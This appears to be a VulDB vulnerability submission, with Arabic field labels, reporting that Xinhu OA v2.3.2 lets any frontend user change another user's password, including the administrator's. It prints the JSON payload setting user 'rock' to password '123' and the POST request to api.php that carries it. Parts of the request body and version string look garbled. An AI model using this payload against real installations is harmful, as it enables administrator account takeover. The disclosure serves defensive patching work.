| عنوان | Any user's password modification vulnerability in Xinhuo OA V2.3.2 |
|---|
| الوصف | Xinghu OA v2.3.2 has a vulnerability in changing the password of any user in the frontend. An attacker can use this vulnerability to change the administrator password and successfully log in to the backend.
1、The payload generated to change the password is as follows:
The data passed in is
$data='{"msgtype":"editpass","user":"rock","pass":"123"}';, user is the username and pass is the password to be changed.
2、Send request package:
POST /xinhu/api.php?m=reimplat&a=index HTTP/1.1
31ae15.X3amdiGpSx5aZqNWaq6NSZVut2MjYWm5UqdTHn1OQWtPFrKuIalKTZGNW4g |
|---|
| المصدر | ⚠️ https://github.com/magicwave18/vuldb/issues/1 |
|---|
| المستخدم | magicwave18 (UID 52598) |
|---|
| ارسال | 24/09/2023 12:47 PM (3 سنوات منذ) |
|---|
| الاعتدال | 29/09/2023 04:27 PM (5 days later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 240926 [Xinhu RockOA 1.1/2.3.2/15.X3amdi Password api.php?m=reimplat&a=index تجاوز الصلاحيات] |
|---|
| النقاط | 20 |
|---|